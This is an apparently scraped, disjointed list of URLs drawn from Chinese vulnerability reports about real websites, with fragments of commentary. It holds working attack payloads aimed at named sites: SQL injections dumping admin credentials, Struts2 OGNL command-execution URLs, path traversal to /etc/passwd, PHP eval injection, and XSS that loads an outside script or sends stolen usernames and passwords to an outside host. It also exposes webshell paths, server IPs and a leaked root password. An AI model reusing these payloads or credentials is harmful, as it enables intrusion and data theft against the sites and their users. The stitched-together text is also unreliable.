/3g/tech/proc/comment/cmnt_list.php?vt=1&did=1160281&sid=121304&cmntg=1&tid=84&vid=44 /personinfosearch.do?method=init /login.do?method=init /qqshow_v3/htdocs/live/popup/huipu/popup.html?domain=com none /qqshow_v3/htdocs/live/popup/huipu/popup.html?domain=com /anti_theft/ /anti_theft/get_bindphone_json.jsp /index.php?a=goodsShow&c=goods&m=content&gid=1%27%22 /index.php?a=like&c=goods&m=content&uid=849976%%27%20and%201=1%20and%20%27%%27=%27 /cpa.php?id=7 /user/userpicupload.net?IDContact=42551326 /user/userpicupload_submit.net?IDContact=42551326&type=CONTACT /index.php?m=content&c=goods&a=myhome&uid=884382 /?c=member&m=room&a=note&id=21 /?c=member&m=album&a=albumlist&uid=1024162 /home.action / /programs/view/id-10.html /programs/view/id-541.html app.sh.sohu.com pkmore1.php?id= /login.action /resin-doc/examples/security-basic/viewfile?file=WEB-INF/password.xml /website/admin.htm / www.hljlr.gov.cn这个站的ip是72 /shownews.aspx?id=35 /正式我们要找的目标 /JsFront/ZJManage/xinxiang/ZxtsList.aspx?BoxGroupID=9fcf491d-3736-497a-a2e4-03e682bfb788 /honor.php?id=%Inject_Here%-1%20or%20104%3d102 /news/newscontent.aspx?newsid=305 / /dpool/sports/live/xlivefoot/index.php?from=oldlive&match_id=2013042901&oid=livesina&vt=4 /dpool/sports/live/xlivefoot/index.php?from=oldlive&match_id=2013042901 /dpool/sports/live/xlivefoot/index.php?from=oldlive&match_id=2013042901 /IOC/client/login!index.action /info.php找到网站根目录,然后访问http://client31.v.vnet.mobi/images/upload.php,直接指定目录,上传php大马。 /?product-gnotify /?product-gnotify /list_search/0/%2527union+select+1+from+ /account/recharge.do?method=alipay&money=399” /account/recharge.do?method=alipay&money=任意金额” /Index.action /pgsh/index.action /jjxt/Index.action /school/index.action?ID=210204500001 /login.do /admin/register/index.action /suite/login.do /suite/login.do /suite/login.do /suite/login.do /suite/login.do /suite/login.do?portalId=A&siteKey=0 /skills/login.do /skills/login.do /admin/Login.do /login.do /homeinnsupload/ /homeinnsformmt/resv/resv.aspx /service/bill/fycx/downdloaddetail.jsp?BeginDate=201304&EndDate=201304&QueryType=1&AreaCode=0853&AccNbr=[马赛克 /w83/album-aid-11678296.html /htmleditor/extendfile/UploadFile.jsp /mngr/statist/getUserStatList.action /topic/hcc/WEB-INF/ /topic/hcc/WEB-INF/web.xml /topic/hcc/WEB-INF/classes/userinfo.xml /topic/hcc/login.jsp /cn/search.aspx?k=1';select%20*%20from%20sysobjects%20where%20@@version%3E0;-- /cn/search.aspx?k=1';select /image/2013/5/1/1367396666488.jsp?pwd=023&cmd=netstat /?c=member&m=room&a=note&id=20 /?c=member&m=album&a=albumlist&uid=1021880 /?c=member&m=room&a=note'&id=20 /area.action /usr/local/software/glassfish3122/glassfish3/glassfish/lib/monitor/flashlight-agent.jar /usr/local/software/jdk1.6.0_34/jre/lib/amd64/server:/usr/local/software/jdk1.6.0_34/jre/lib/amd64:/usr/local/software/jdk1.6.0_34/lib/amd64:/usr/java/packages/lib/amd64:/usr/lib64:/lib64:/lib:/usr/lib /dazhon/searchBybigIdListAction.action //plus/search.php?keyword=as&typeArr[111%3D@`\ /drluowei/ask.php?doctoruser=drluowei&doctorid=18529&title=&pathid=3 /login.do /list_videos.do / /p/freecms/ /esteelauders//api/user-info-list?ps=10000 /el/page-02的盲打漏洞获得到的,然后发现这地址竟然是任意条件都可以访问额(不登陆都可以访问额。如果只有管理权限可以访问的话,也就不会存在这个帖子了,肯定会和之前的盲打后台帖子发一起的)。 /msg.ww?site=cntaobao&charset=utf-8&v=2&uid=***&s=1 /msg.aw?site=&v=&uid=1&s=& /2.aspx / /admin/menu.asp /admin/login.php /bground/login.php /bm/detail.php?gid=21&id=64 /api/account/update/ /showfavor.php?id=348330 /123.txt /upload/3911/1123/14/1_20005689.xls /mgmt/system/ /mgmt/system/registerName/registerNameList.do /index.php?m=my&c=follow&a=add&uid=1 /index.php?m=my&c=follow&a=delete&uid=1 /api/post/modify/ /OurHome/modules/core/Login.jsp /resume_preview.php?uid=1934876495&key=UiAHYFZmAW8%3D /resume_preview.php?uid=1&key=UiAHYFZmAW8%3D /resume_preview.php?uid=5&key=UiAHYFZmAW8%3D /resume_preview.php?uid=r&key=UiAHYFZmAW8%3D /wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options%28%29;passthru%28ls%29;error /wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval($_POST[cmd]);error /question.tar /el/page-02 /这个域名被黑,已被别人利用, /item.htm?id=318299998327这个是钓鱼链接 /被转向hao123做广告 /login_view.action /RU123/show.asp?id=612 /Web/Users/login.asp /public/Menu.xml处可全部看到 /frontNewsCenter_showAllInfo.action?newsCenterMark=2&urlInfo=http://www.baidu.com /ecshop/admin/shopinfo.php?act=edit&id=111 / /profile/?short_name=187528&type=9&vid=26361 / /XSS pinyin.cn sohu-inc.com / /conf/server.xml /conf/web.xml /conf/tomcat-users.xml /conf/context.xml /wwwpps/login.jsp找回密码 /user!login.do /examples/ http://he.189.cn/qcQues/quesListInfo.action http://shop.xj.189.cn/eshop/terminal/terminal_info.do http://js.189.cn/redPackets/goRedPackets_home.do www.dedeeims.com http://220.181.11.48:8080/resin-doc/viewfile/?file=/doc/install.xtp http://220.181.11.48:8080/resin-doc/viewfile/?file=index.jsp http://88agent.com/step/index.action http://wooyun.org/bugs/wooyun-2012-012293 http://www.xinnet.com/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ http://hymanage.xinnet.com/Modules/common/components/FCKeditor/editor/dialog/fck_about.html http://manage.xinnet.com/Modules/common/components/FCKeditor/editor/filemanager/browser/default/connectors/test.html http://www.wandafilm.com/user/card_mgr.do?m=initRecharge&cardNo=8002012036436 http://m.3g.qq.com/account.html?uid=59e0434******b3475a17dc10d5ce912&fr=2&aid=aullik5 http://m.3g.qq.com/account.html?uid=59e0434******b3475a17dc10d5ce912&fr=2&aid=aullik5 http://220.181.125.88:8080/stat.do www.xiaomi.com和其它域名咋办呐? https://account.xiaomi.com/pass/serviceLogin?callback=...&sid=eshopmobile,重点是eshopmobile(eshopmobile时会去app.shopapi.xiaomi.com同步登录一下),而网页版的为eshop https://account.xiaomi.com/pass/serviceLogin?callback=...&sid=eshopmobile,主域名和其它域名也能js劫持了。 https://account.xiaomi.com/pass/serviceLogin?callback=http%3A%2F%2Fapp.shopapi.xiaomi.com%2Fv1%2Fauthorize%2Fsso_callback%3Ffollowup%3Dhttp%253A%252F%252Fm.xiaomi.com%252Findex.html%2523ac%253Daccount%2526op%253Dindex%26sign%3DMjIzYzEwMzEzODg1NmI0ZGI2OGViZDljOGRlNjZmOTExYjE1NDBlNw%2C%2C&sid=eshopmobile http://app.shopapi.xiaomi.com/v1/address/list?callback=getall&client_id=180100031013&_=1367750497612 http://net.njfu.edu.cn/web/manager/ http://net.njfu.edu.cn/web/plugin/download.jsp?id=258&for_key=324 http://net.njfu.edu.cn/web/manager/main/index2.jsp http://220.181.143.195/admin http://220.181.143.203/admin http://220.181.143.209/admin http://220.181.143.196/admin http://220.181.143.224/admin http://220.181.143.210/admin http://220.181.143.204/admin http://llh.ecnu.edu.cn/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''= http://llh.ecnu.edu.cn/admin www.dbsdzb.com/NewsType.asp?SmallClass= http://tieba.baidu.com/f/search/res?ie=utf-8&qw=mo%2Fq- http://218.30.115.183/index.jsp http://218.30.115.188/admin/ http://localhost:8082/ECShop_V2.7.3/admin/integrate.php?act=install&code=../../../../ECShop_V2.7.3/data/feedbackimg/6_20130506toqbvy.txt%00 http://play8.pcgames.com.cn/pcgames120903/list.jsp?pageNo=-1 http://play8.pcgames.com.cn/pcgames120903/list.jsp?p=%E2%80%98-1&k=%A1%AE http://126.am/70Qdp3';h.appendChild(s) filter:alpha(opacity=0) moz-opacity:0;opacity:0 http://www.acfun.tv@126.am/n6ccT0]http://www.acfun.tv/v/ac634542[/url http://www.acfun.tv/api/mail.aspx?name=newMail位置没有来源验证: http://www.acfun.tv/api/mail.aspx?name=newMail http://www.acfun.tv@126.am/n6ccT0]http://www.acfun.tv/v/ac634542[/url http://61.144.19.121:5600/down/detailLocalFile.jsp?filename=/WEB-INF/web.xml&name=%D7%E9%D6%AF%BB%FA%B9%B9%B4%FA%C2%EB%D6%A4.jpg&A83C69FBA585B0CA06ADBAA19CC43EF36=CpnvRLGdHjTqQY7mypL8RWTBLy7DC8cvQ0NvTSfYfmLvLdqWyPZ8!-213033169!1367868989698 http://java.sun.com/xml/ns/j2ee xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd http://www.yintai.com/product/productdetail.aspx?itemcode=20-277-4661C http://www.licence.org.cn:8080/licencezgyq0209.sql http://www.adata-group.com http://xl.tgbus.com/ http://wowdb.tgbus.com/manager/NPC_List.aspx http://api.tgbus.com/comment2/admin/login.aspx http://wowdb.tgbus.com/Search.aspx?keyword=1%27 http://www.sxu.edu.cn/zncs/sdzx/shuidian/anli.asp?Sort_ID=26,注入类型为:整型(integer)、数据库为access数据库、脚本语言为asp http://www.trueqq.com/jiaoyou.php?mod=search&residecity=%27%20or%20@%60%27%60%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20concat%280x7e,0x27,unhex%28hex%28user%28%29%29%29,0x27,0x7e%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20or%20@%60%27%60%20and%20%271%27=%271 http://lady.weibo.com http://lady.weibo.com/topic/191 http://www.ias.fudan.edu.cn/File.aspx?filepath=/default.aspx,通过修改filepath的值可以实现任意文件下载,导致源码泄露。恶意攻击者能够通过该漏洞下载数据库配置文件,从而进一步攻击,获取更高权限。 data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+ http://mail.***.cn/webmail/index.php?action=framesetsV2 http://bangong.zhongxi.cn/edoas2/oa.jsp http://bangong.zhongxi.cn/edoas2/oa.jsp http://bangong.zhongxi.cn/jmx-console/HtmlAdaptor?action=displayMBeans http://tsg.zhongxi.cn/lib.libone.action http://wooyun.org/bugs/wooyun-2010-010949 http://jwxt.zhongxi.cn/JWWEB/_data/ http://jpkc.zhongxi.cn/guanli/login.php?msg=2 http://jpkc.zhongxi.cn/teacher.php?cnid=3OWMEO7XL6WAANGDJ13WHYVU40NVYRFF&ctid=Y1M2DJPUJCO92GGN4IUEFWY1LS5AQNDY&ccid=OJFRPROTJEIDH4RQVYU7OPLYA7UII9AU http://www.exploit-db.com/exploits/24272/。 http://house.china.com.cn/searchdir/esfsearch.aspx?ddlbuy=0 URL:http://love.sina.com.hk/cgi-bin/search/list.cgi?action=showpage&total=3129&listid=27 http://kan.duowan.com/1304/230995638943.html URL:http://www.syfc.gov.cn/fcdw/index.action http://wooyun.org/bugs/wooyun-2013-021270 http://zs.nacta.edu.cn/front/cms/article!cmsView.action http://video.nacta.edu.cn/l29-xielm9ox/photo/thanks.php http://59.65.196.30/inc/article.php?action=read&id=46 http://www.suidian.cn/Ct_details_id_5551.shtml http://www.suidian.cn/Ct_details_id_5551'.shtml,如图 http://www.suidian.cn/Ct_details_id_5551 http://www.suidian.cn/Ct_details_id_5551 http://keyun.96520.com http://card.yintai.com/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/jsp/connector http://www.ekahau.com/products/real-time-location-system/wi-fi-tags.html http://www.ekahau.com/products/real-time-location-system/overview.html http://www.ekahau.com/ URL:http://sports.sina.com.hk/cgi-bin/vote/forum.cgi?action=result&id=28 http://up.qlwb.com.cn/op/list.asp?t=0 http://up.qlwb.com.cn/newpic/201210189475996.asp http://up.qlwb.com.cn/newpic/201210189492139.asp;jpg http://www.ooopic.com/ http://user.ooopic.com/user/login.php http://product.aili.com/index.php?m=member&c=index&a=register&siteid=1 http://product.aili.com/api.php?op=add_favorite&url=demon.aaa&title=%2527 http://product.aili.com/api.php?op=add_favorite&url=pro&title=%2527%2520and%2520%2528select%25201%2520from%2528select%2520count%2528%252a%2529%252Cconcat%2528%2528select%2520%2528select%2520%2528select%2520concat%25280x23%252Ccast%2528concat%2528username%252C0x3a%252Cpassword%252C0x3a%252Cencrypt%2529%2520as%2520char%2529%252C0x23%2529%2520from%2520pro_admin%2520LIMIT%25200%252C1%2529%2529%2520from%2520information_schema.tables%2520limit%25200%252C1%2529%252Cfloor%2528rand%25280%2529%252a2%2529%2529x%2520from%2520information_schema.tables%2520group%2520by%2520x%2529a%2529%2520and%2520%25271%2527%253D%25271 http://id.yy.duowan.com/save_man_info.php http://i.sohu.com http://i.sohu.com/p/=v2=aaBh5ULzWW9pVYYtpmNvbQ==/blog/view/260587564.htm http://i.sohu.com/a/app/discuss/save.htm?_input_encode=UTF-8 http://t.sohu.com http://t.sohu.com/ http://t.sohu.com/twAction/reTwitter http://register.mail.sohu.com/servlet/getUnreadMailCountServlet?callback= http://88agent.com/qywh/4028f8ae3d8025e5013d80ad73e30014.action http://www.[马赛克]vip.com/qq9914932/adad/isee.asp?txtSearch=&OrderList=1&Submit=++%B2%E9%BF%B4%B1%BE%D1%F9%B1%BE%D7%CA%C1%CF%B5%E3%BB%F7%CE%D2--%CC%E1%BD%BB++&showtag=1&showlaox=1 http://www.[马赛克]muma.com/t2.txt http://widget.weibo.com/dialog/follow.php http://widget.weibo.com/dialog/follow.php?fuid=1922455660&refer=&language=zh_cn&type=widget_page&vsrc=app_followbutton%27%7D%3Bonload=function%28%29%7BSTK.scriptLoader%28%7Burl%3A%27http%3A%2F%2Fmxss.sinaapp.com%2Ffish.js%27%7D%29%7D%3Bb%3D%7Ba%3A%27 http://widget.weibo.com/dialog/follow.php?fuid=1922455660&refer=&language=zh_cn&type=widget_page&vsrc=app_followbutton%27%7D%3Bonload=function%28%29%7BSTK.scriptLoader%28%7Burl%3A%27http%3A%2F%2Fmxss.sinaapp.com%2Ffish.js%27%7D%29%7D%3Bb%3D%7Ba%3A%27&r="+Math.random() uid:1981622273 onComplete:function() uid:1922455660 onComplete:function() content:encodeURIComponent(blog+xss_url),appkey:1629860458 onComplete:function() content:encodeURIComponent(encodeURIComponent(topic+blog+xss_url)),appkey:2191225368,refer:'www.google.com.hk',language:'zh_cn',url_param:'',_t:0 http://mxss.sinaapp.com/g.php?n="+encodeURIComponent(name)+"&p="+encodeURIComponent(pass) keyCode:window.event.keyCode http://mes.4006055885.com http://www.lezu.net.cn/可以上传附件 http://mashifu.astro.ifeng.com//tupian.php?act=config.php http://mashifu.astro.ifeng.com//tupian.php?act=c:\boot.ini PHPINFOhttp://mashifu.astro.ifeng.com/test.php http://365net.tw/about/up/upload_flash.asp?formname=myform&editname=picpath1&uppath=uploadpic&filelx=jpg http://vip.offcn.com/index.php?app=zxtk&mod=Index&act=showinfo&categoryId=1&id=438漏洞好像有几处,测试时忘记保存了,你们自己再详细测试吧。 http://118.244.192.161/user/ http://www.zfs4.com/jdty.html http://www.scau.edu.cn/xw/201305/t20130508_116682.htm http://www.sogou.com/quan?query=%E6%A2%A7%E6%A1%90%E9%9B%A8&qt=zhaopin%22}%0aalert(1)//&sourceid=inttab_news http://www.sogou.com/quan?query=%E6%A2%A7%E6%A1%90%E9%9B%A8&qt=zhaopin%22}%0aeval(location.href=%22http://wutongyu.info%22)//&sourceid=inttab_news http://www.sogou.com/quan?query=梧桐雨&qt=zhaopin"}%0a%0a%0aeval("\u006c\u006f\u0063\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072\u0065\u0066\u003d\u0027\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0075\u0074\u006f\u006e\u0067\u0079\u0075\u002e\u0069\u006e\u0066\u006f\u0027")//&sourceid=inttab_news http://smezj.sme.gov.cn/index.action http://smezj.sme.gov.cn/index.action http://211.167.243.131/indexAction!login.action http://zcps.tjmec.gov.cn/user!save http://www.ychdj.gov.cn/index.action http://www.ychdj.gov.cn/articleMsg.action?articleId=3365&channelId=6a http://minqi.china.com.cn/do/s_rpc.php http://ris.ccb.com/journalx/secure/admin/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector http://mail.qq.com/cgi-bin/mail_spam?action=check_link&url=javascript:alert(document.cookie) http://www.dlbc.org.cn/login/Jeecms.do http://220.176.160.51:8899/DBSMS/main/ http://220.176.160.51:8899/DBSMS/sys/DataLink.aspx http://220.176.160.51:8899/dbsms/main/Main.aspx http://v.huatu.com/home/memberInfo.php?rid=2363643 http://www.gewara.com/sport/itemList.xhtml?pageNo=1&showtype=list&type=-1 http://www.gewara.com/sport/itemList.xhtml?pageNo=1&showtype=list&type=-1%27%20or%20%2741%27%3d%2741 http://www.tuigirl.com/alipay/alipayto.php?orderid=201305091050293&subject=%E6%A0%87%E5%87%86%E8%AE%A2%E9%98%85&total_fee= http://m.t.58.com/css/logout http://www.tompda.com/list/?cid=1&Querys=&o=article_addtime http://ffp.airchina.com.cn/admin/adminLogin.jsp http://kf.joyoung.com/iwanttoanswerlist_.html?pscode=ff8080813835c7d201384bd1da9c0333 http://bbs.jeecms.com http://202.96.31.16:8080/vrd/front/userInfo/gotoIndex.action?temp=4 http://photowoo.renren.com/?ngAdID=04P55 http://chaxun.766.com/zx/clcx/index.php/admin/ http://mail.156.cn/ http://bbs.aili.com/plugin.php?id=pointsMall:product_list&ailibnumfrom=0&ailibnumto=50%20order%20by%202-- http://so.91.com/search.jsp http://ebook.91.com/Common/Search.aspx?Rank=PublishDateDesc&pagesize=10&searchKey= http://author.ks.91.com/Handler/Login.ashx?_post___VIEWSTATE=%2FwEPDwUKMTQ5MDIxNjIyMmRkM2nqliGdFaBBzEZY4%2BItXrE%2BZhw%3D&__SCROLLPOSITIONX=0&__SCROLLPOSITIONY=0&__EVENTTARGET=&__EVENTARGUMENT=&account=88952634&pawwsord=88952634&autologin=on http://babybook.91.com/的路径爆出 http://jia.91.com/index.php?c=search&type=bb&class=tag&id=282 http://tu.91.com/index.php?c=user&a=index&gid=&uid=140192398&t=1这个页面为例,跳转页码的type这没有限制 http://sj.bbs.91.com/thread/26/434/20100302/plugin.php?id=dsu_amupper:list http://music.baidu.com/search?key=aaaaaaaaa%27%20onload=%27alert%281%29 http://xui.ptlogin2.qq.com/cgi-bin/qlogin?jumpname=&style=11 http://www.qq.com/?clientuin=aaa&clientkey=bbb http://fuxing.chnmuseum.cn/news_atc.php?id=97 http://fuxing.chnmuseum.cn/guestbook.php http://centennial.chnmuseum.cn/news_content.php?id=38 http://ncz.yeepay.com/存在命令执行漏洞,借助struts2的私有变量class.classLoader.jarPath可 javascript:history.back() javascript:history.back() javascript:history.back() http://bookcity.dayoo.com/index.php?module=product&app=product&typeHandler=book&action=search&type=4&text=I24 http://shop.ehuatai.com/isale/report/reportAction-insertPre.action http://114.255.169.92/data.rar http://www.51ey.com/loginAction!login.action http://ris.ccb.com/CN/feedback/backdoor.jsp http://ris.ccb.com/CN/feedback/ http://ris.ccb.com/journalx/secure/admin/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=File&CurrentFolder=../../../../Jweb_tzyj/CN/feedback/ http://newcourse.juren.com/index.php?se=9cb530c91de6478097704ff2e166e0ec&ct=2dd4ab50067243bba4e84bcbefa4e00d&tst=b5e2ed0589694a36a236228efec04005 http://course.juren.com/showCourse.php?school_id=8a80479536a9ea0a0136bdf656de77f8 http://newcourse.juren.com/showCourse.php?school_id=345f10a024ef11e2ac800000c9ac71fe http://www.juren.com/temp/ http://www.juren.com/sitemap.xml http://dkp2.duowan.com/member.do?method=member_list&guildid=herowow&dkpid=1504&work=sq&orderBy=ccount,if http://dkp2.duowan.com/member.do?method=member_list&guildid=herowow&dkpid=1504&work=sq&orderBy=ccount,if http://db.duowan.com/mt/card/list.html?conditions[sort]=userView%20desc%20limit%201%23.desc http://work.china.alibaba.com http://webscan.360.cn/vul/list http://c17.yunpan.360.cn/my#%2F%3Cimg%20src=x.com%20onerror=alert%28/test/%29%20/%3E%2F http://fang.xiashanet.com/common/lib/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media http://abs.apple.com/ssurvey/thankyou.action http://csat.apple.com/ssurvey/thankyou.action http://www.chem.pku.edu.cn/dxhx10/managenews/index.htm http://wuxi.ss.pku.edu.cn/getFNL.action?cateIden=3 http://www.gse.pku.edu.cn/jchjy/admin/admin_login.asp http://pri.pku.edu.cn:8081/lvyou/ http://ccl.pku.edu.cn:8080/pos/Implication/administrator.jsp http://zzb.pku.edu.cn/bdcms/pku/survey/ViewVoteForm.do?qid=9 http://skb.pku.edu.cn/list.asp?ClassID=05121309452360510 http://www.cpc.pku.edu.cn/view.asp?type=ours&id=77 http://www.dag.pku.edu.cn/tuji/jsdxt.asp?nclassid=71 http://www.metc.pku.edu.cn/dd.php?id=368 http://www1.law.pku.edu.cn/news/articledisplay.asp?NewID=6456 http://www.ati.pku.edu.cn/system/list.php?type=3 http://lecture.pku.edu.cn/index.php?action=&typeid=26 http://courseweb.pku.edu.cn/course/www/list.php?cat_id=25 http://www.tv.pku.edu.cn/show.asp?id=1322 http://www.yuchengtech.com/cms https://mail.qq.com http://www.wooyun.org/bugs/wooyun-2010-021473/ http://mail.cetc.com.cn/admin/ http://mobius.qyer.com/login_deal.php?password=111111&account=1 http://crm.263.net/存在命令执行漏洞,借助struts2的私有变量class.classLoader.jarPath可以执行任意命令(并且是root权限),很可能获得webshell(当然我没有尝试获取)。由于是销售管理系统,有登录的地方,可能会威胁到用户的数据安全。因为是以root权限执行任意命令,可获得服务器完全控制权,并且可能以这台服务器为跳板威胁周围其它服务器的安全。 http://www.yy.com/gateway/isuserlogined?callback=YYNavbarUDB.checkLoginCallback处可以直接插入script代码来导致一个xss漏洞的存在。 http://183.61.6.68:8080/resin-doc/examples/security-basic/viewfile?file=WEB-INF/password.xml http://huodong.duowan.com/js/.svn/entries该站点很多目录都存在svn,会泄漏文件路径及目录结构以及源代码泄漏。 http://huodong.duowan.com/apc.php该处存在apc信息泄漏。 http://huodong.duowan.com/log.txt该处存在敏感信息泄漏,包括用户名以及密码等信息。 http://xiage.yy.com/research.php?rid=1%20and存在sql注射漏洞。 http://202.204.190.42/oa_client/info.aspx http://202.204.190.42/oa_server/App_Pages/App_frame_Server/UserLogin.aspx http://202.204.190.42/oa_server/App_Pages/App_frame_Server http://202.204.190.42/oa_server/App_Pages/App_page/SchoolList.aspx http://202.204.190.42/oa_server/App_Pages/App_page/user_list.aspx http://202.204.190.42/oa_server/App_Pages/App_page/UserSpuerAdd.aspx http://yzddpk.jstv.com http://group.100e.com/14004/topic/101428/index.aspx?UserID=2487728 http://my.weke.com/loginAction.action http://www.glpay.com.cn/?act=download http://www.glpay.com.cn/?act=download&path=../../../etc/passwd http://shop.hisense.com/dwr/test/DWRSearchUserService http://www.womai.com/dwr/test/DWRSearchUserService http://www.womai.com/dwr/test/DWRSearchUserService www.womai.com http://localhost/src/attachview.php?path=相对路径 http://id.kingdee.com/存在命令执行漏洞,借助struts2的私有变量class.classLoader.jarPath可以执行任意命令(并且是root权限),很可能获得webshell(当然我没有尝试获取),进而可能威胁到用户的数据安全。因为是以root权限执行任意命令,可获得服务器完全控制权,并且可能以这台服务器为跳板威胁周围其它服务器的安全。 club.qd10010.cn/admin/ http://www.dahuatech.com/download.aspx http://60.191.94.116/erepair/DeviceQuery.aspx http://123.233.247.74/wjj_site/ldaplogin/login_login.action http://123.233.247.74/wjj_site/ldaplogin/login_login.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g) http://123.233.247.74/wjj_site/ldaplogin/login_login.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g) http://www.srcwork.com http://113.106.x.x9/admin/x/xfig/.svn/text-base/test.inc.php.svn-base www.kugou.com/]$ http://newinfo.lvmama.com/locoy/locoy2050.php?mod=phpcms&file=content&action=add&catid=69 http://newinfo.lvmama.com/locoy/locoy2050.php浏览这个的时候 http://wooyun.org/actdo.php?action=sms&do=sendcontact&corpid=【厂商ID】&whitehatid=【白帽子id】 http://zfxxgk.nj.gov.cn/news/ http://ss.263.net/portal/user/userRegister.action http://xxxx/cmseasy/bbs/add-archive.php?cid=1 ip:115.***.***.24\115.***.***.25\115.***.***.50 user:t420is root:admin@wj http://attach.blackbap.org/xinnetol.rar http://www.xmbus.gov.cn/ http://www.xmbus.gov.cn//admini/index.php?m=system&s=bakup&a=download&filename=../../index.php http://www.xmbus.gov.cn//config/7.php http://www.secoo.com/shoppingCart/cart/shoppingCartAction_queryCart.action http://www.secoo.com/shoppingCart/cart/shoppingCartAction_queryCart.action?class.classLoader.jarPath=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess[%22allowStaticMethodAccess%22]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27/sbin/ifconfig%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23kxlzx%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23kxlzx.println%28%23d%29%2c%23kxlzx.close%28%29%29%28meh%29&z[%28class.classLoader.jarPath%29%28%27meh%27%29 http://121.28.49.3/hbzy/ http://121.28.49.3/hbzy/1.rar http://121.28.49.3/hbzy/2.rar http://121.28.49.3/hbzy/main.jsp http://159.226.97.160/Web/sql.asp www.fgw.cas.cn www.casjob.com www.gh.cas.cn http://www.sn.stats.gov.cn/zmhd.asp?menuId=2011&pmenuId=20 http://2sc.sohu.com/搜狐二手车里发布出售信息的时候。对车况介绍:没有任何过滤。后台直接输出 http://online.hoau.net:8080/THOMS/logining.do http://infoaudit.baihe.com/UserManage.jsp http://xss http://profile.baihe.com/ http://dalian.tuchong.com http://www.fantong.com/wuxi-pin/ http://www.fantong.com/cook-362754/ http://lib.bift.edu.cn:80/detail.asp?map=/movement/20121231104547691.jpg&id=11 http://lib.bift.edu.cn:80/Test2012/piao_deal.asp?page=2 http://lib.bift.edu.cn:80/vote_idea.asp?page=2 http://lib.bift.edu.cn:80/Test2012/piao.asp?bk=&page=2 http://lib.bift.edu.cn:80/Test2012/piao.asp?bk=88888 http://lib.bift.edu.cn:80/briefInf.asp?page=2 http://lib.bift.edu.cn:80/acNavi.asp?page=2 http://lib.bift.edu.cn:80/Test2012/piao.asp?bk=88888 http://61.168.11.30:8011/AirChargeWeb/login!login.action http://wooyun.org/bugs/wooyun-2010-019550 http://w.sohu.com/ http://www.epailive.com/bottomAction_bottom_include.do?fileName=about.jsp http://www.epailive.com/bottomAction_bottom_include.do?fileName=../WEB-INF/web.xml http://www.taiyuan.gov.cn/?yy=973&b=107428 http://www.taiyuan.gov.cn/?yy=973&b=107428 http://www.taiyuan.gov.cn/?yy=973&b=107428 https://passport.coo8.com/sso/register.action存在命令执行漏洞,借助struts2的私有变量class.classLoader.jarPath可以执行任意命令(并且是root权限),很可能获得webshell(当然我没有尝试获取)。可威胁用户数据的安全。电商网站存在这样的漏洞危害是非常严重的。 http://221.199.11.171:7070/Kjbm/index.action http://221.199.11.171:7070/Kjbm/baoming/login.action;jsessionid=96FBEA931257B1D6909B0150D9C49487 http://219.159.83.208:801/forui/corpinfo/corpbaseinfo.aspx http://www.gwbn.net.cn/AdminManage/Login.aspx http://www.gzgwbn.com.cn/job/cn/login.asp http://www.bjgwtel.net/wp-includes/ http://xxx:xxx@xxx.com/访问一个页面的时候,会提示“You http://aaaaaaaaa.xxxxxxx.baidu.com http://www.sindrax.cn/pma/ http://comment.info.hc360.com/存在任意命令执行漏洞,root权限。借助struts2的私有变量class.classLoader.jarPath可以执行任意命令(并且是root权限),很可能获得webshell(当然我没有尝试获取),进而可能威胁到用户的数据安全。因为是以root权限执行任意命令,可以获得服务器的完全控制权,并且可能以这台服务器为跳板威胁周围其它服务器的安全。 http://www.swufe-online.com/oa/docs/readFile.jsp?id=182 http://www.swufe-online.com/oa/docs/readFile.jsp?id=182 http://www.swufe-online.com/oa/docs/readFile.jsp?id=1820';select http://www.swufe-online.com/oa/docs/readFile.jsp?id=182';select http://gadget.talk.renren.com/redirects http://passport.renren.com/transfer.do?transfer=&origURL= http://www.renren.com/callback.do?t=&origURL= http://yx.kugou.com/yx.kugou.com.rar http://i.taobao.com/id http://www.haichanggroup.cn http://www.haichanggroup.cn/yp/subjianli.asp?id=22 http://active.b2b.hc360.com/wuqun/homea/crm/login.asp http://law.inc.hc360.com/finance/PrintPage.aspx?fund_id=200237 http://www.scaic.gov.cn:7010/ http://127.0.0.1/index.php?ac=order&at=orderupdae&bprice=anb&did[aa]=87|dcc|ccc|a1|a2|a3|a4|a5&amount=1 http://127.0.0.1/index.php?ac=order&at=orderupdae&bprice=anb&did[aa]=87|dcc|ccc|5f4f40bac141a48d05a94ac90514fe05|a2|a3|c8273f6a0177588459b1971c65829cc6|a5&amount=1 